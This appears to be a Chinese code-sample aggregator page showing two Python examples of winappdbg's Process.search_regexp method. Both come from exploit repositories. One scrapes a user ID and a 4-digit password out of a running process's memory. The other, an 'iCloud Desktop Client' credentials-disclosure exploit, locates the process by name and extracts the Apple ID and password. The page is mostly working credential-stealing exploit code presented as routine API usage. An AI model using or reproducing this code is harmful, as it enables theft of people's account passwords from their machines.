Python Process.search_regexp方法代码示例

本文整理汇总了Python中winappdbg.Process.search_regexp方法的典型用法代码示例。如果您正苦于以下问题：Python Process.search_regexp方法的具体用法？Python Process.search_regexp怎么用？Python Process.search_regexp使用的例子？那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类winappdbg.Process的用法示例。

在下文中一共展示了Process.search_regexp方法的2个代码示例，这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞，您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: memory_search

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import search_regexp [as 别名]
def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.

        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
        
        print 'Possible UserIDs found:'
        found = [i[-1] for i in found]
        for i in set(found):
           print i.replace('\x00','')
        
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
        
        return found

开发者ID:AlexxNica，项目名称:exploit-database，代码行数:34，代码来源:40342.py

示例2: Process

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import search_regexp [as 别名]
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		
		user_pattern = '\x61\x70\x70\x6C\x65\x49\x44\x3D([a-zA-Z0-9_.+-][email protected][a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)'
		for address in process.search_regexp(user_pattern):
			memory_dump.append(address)
		usr = memory_dump[0][2].split('=')[1]
		
		memory_dump = []
		pass_pattern = '\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]([A-Za-z0-9\!\@\#\$\%\^\&\*\(\)\_\+\{\}\:\"\|\<\>\?\[\]\;\'\,\.\\\/\=\-]){8,20}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
		for address in process.search_regexp(pass_pattern):
			lproj = re.findall('([a-z]{2}\.lproj)|(apple-[a-z]{0,3})', address[2])
			if not lproj:
				cstr = re.sub(r'\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]|\x00', '', address[2])
				memory_dump.append(cstr)
		pwd = memory_dump[6]
		
		if usr != '' and pwd !='':
			found = 1
			print "[+] iCloud Credentials found!\r\n----------------------------------------"

开发者ID:yakir-wizman，项目名称:Vulnerabilities，代码行数:33，代码来源:Apple+iCloud+Desktop+Client+v5.2.1.0+Local+Credentials+Disclosure+After+Sign+Out+Exploit.py

注：本文中的winappdbg.Process.search_regexp方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台，相关代码片段筛选自各路编程大神贡献的开源项目，源码版权归原作者所有，传播和使用请参考对应项目的License；未经允许，请勿转载。